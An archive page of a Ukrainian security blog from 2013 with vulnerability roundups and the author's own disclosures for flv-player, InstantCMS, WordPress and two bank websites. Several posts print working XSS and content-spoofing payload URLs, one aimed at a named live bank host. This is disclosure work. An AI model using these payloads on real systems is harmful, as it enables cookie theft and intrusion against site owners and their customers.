Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №119

23:51 10.10.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.

  • WordPress Mukioplayer 1.6 SQL Injection (деталі)
  • WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
  • WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:22 10.10.2013

В даній добірці уразливості в веб додатках:

  • Polycom - Command Shell Grants System-Level Access (деталі)
  • vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities (деталі)
  • Polycom - Firmware Update Command Injection (деталі)
  • SilverStripe(R) Information Exposure Through Query Strings in GET Request (CWE-598) (деталі)
  • Polycom - H.323 CDR Database SQL Injection (деталі)
  • Joomla core <= 3.1.5 reflected XSS vulnerability (деталі)
  • Polycom - H.323 Format String Vulnerability (деталі)
  • Vulnerabilities in owncloud (деталі)
  • HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information (деталі)
  • Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities (деталі)

Уразливості в flv-player

23:58 08.10.2013

03.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в flv-player. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

08.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Уразливі flv-player 3.5 та попередні версії.

Добірка уразливостей

17:28 08.10.2013

В даній добірці уразливості в веб додатках:

  • Varnish 2.1.5 DoS in STV_alloc() while parsing Content-Length header (деталі)
  • Multiple vulnerabilities in phpMyAdmin (деталі)
  • MojoPortal XSS (деталі)
  • Multiple XSS Vulnerabilities in Jahia xCM (деталі)
  • Varnish 2.1.5, 3.0.3 DoS in VRY_Create() while parsing Vary header (деталі)
  • SQL Injection in Cotonti (деталі)
  • vtiger CRM <= 5.4.0 (SOAP Services) Authentication Bypass Vulnerability (деталі)
  • Samsung TV DoS (possible overflow) via SOAPACTION (деталі)
  • vtiger CRM <= 5.4.0 (vtigerolservice.php) PHP Code Injection Vulnerability (деталі)
  • vtiger CRM <= 5.4.0 (SOAP Services) Multiple SQL Injection Vulnerabilities (деталі)

FPD уразливості в WordPress

23:57 27.09.2013

У версії WordPress 3.6 розробники виправили декілька уразливостей. Але про них розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок).

В цьому місяці я дослідив зміни в версії 3.6 движка і виявив Full path disclosure уразливості в адмінці. Про які не згадали в описі релізу WP 3.6, але згадали про них в Codex серед виправлених багів (при тому, що вони іноді згадують про FPD в анонсах релізів). Що типово для розробників WP - ще з 2007 року вони часто приховують виправлені уразливості.

Раніше я вже писав про уразливості в WordPress та Akismet.

Full path disclosure (WASC-13):

В Media Library якщо атачмент не має батька.
В функції parent_dropdown().
В функції wp_new_comment().
В функції mb_internal_encoding().
При обробці метаданих зображень.
В функції get_post_type_archive_feed_link().
В функції WP_Image_Editor::multi_resize().
В функції wp_generate_attachment_metadata().
При видаленні або відновленні елемента, що вже не існує.

Уразливі WordPress 3.5.2 та попередні версії.

Добірка уразливостей

17:29 27.09.2013

В даній добірці уразливості в веб додатках:

  • Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header (деталі)
  • Basic Forum by JM LLC - Multiple Vulnerabilities (деталі)
  • Xymon Systems and Network Monitor - remote file deletion vulnerability (деталі)
  • Cross-Site Scripting (XSS) in Magnolia CMS (деталі)
  • Varnish 2.1.5, 3.0.3 DoS in http_GetHdr() while parsing Vary header (деталі)

Нові уразливості на kredobank.com.ua

22:48 26.09.2013

15.06.2013

У лютому, 22.02.2013, я знайшов нові уразливості на http://kredobank.com.ua - сайті банка КРЕДОБАНК. Цього разу це Cross-Site Scripting дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kredobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.09.2013

XSS:

На сайті ще є багато інших уразливостей.

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №118

23:53 25.09.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC Testimonia, NextGen Smooth Gallery та Event Easy Calendar. Для котрих з’явилися експлоіти. IndiaNIC Testimonia - це плагін для написання рецензій, NextGen Smooth Gallery - це плагін для створення галереї зображень, Event Easy Calendar - це плагін для створення календаря на сайті.

  • WordPress IndiaNIC Testimonial 2.2 XSS / CSRF / SQL Injection (деталі)
  • WordPress NextGen Smooth Gallery Cross Site Scripting (деталі)
  • WordPress Event Easy Calendar 1.0.0 XSS / CSRF / Input Validation (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Нові уразливості в InstantCMS

17:27 25.09.2013

30.07.2013

У липні, 14.07.2013, я знайшов Login Enumeration, Cross-Site Scripting та Content Spoofing уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в InstantCMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.09.2013

Login Enumeration (WASC-42):

http://site/users/login

Можна виявляти логіни по профілям користувачів. А також логіни користувачів виводяться в багатьох розділах сайта (сторінці користувачів та інших), бо розробники зовсім не переживають за витоки логінів користувачів.

Cross-Site Scripting (WASC-08):

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Вразливі InstantCMS 1.10.2 та попередні версії.

Дані уразливості досі не виправлені.

Уразливості на pravex.com

23:54 21.09.2013

27.04.2013

У січні, 11.01.2013, я знайшов Cross-Site Scripting та Information Leakage уразливості на http://pravex.com - сайті Правекс Банка. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на kredobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.09.2013

XSS:

http://pravex.com:8088/queryacc.jsp?acc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage:

http://pravex.com:8088/queryacc.jsp

Витік інформації про рахунки клієнтів.

Адміни зупинили роботу цього веб додатку (чи внесли баг, тому він перестав працювати). І тим самим “виправили” дві вищезгадані уразливості, але додали нову Information Leakage дірку. Тепер на сторінці виводиться інформація про веб сервер, про Java пакети на сервері та про SQL запит до СУБД.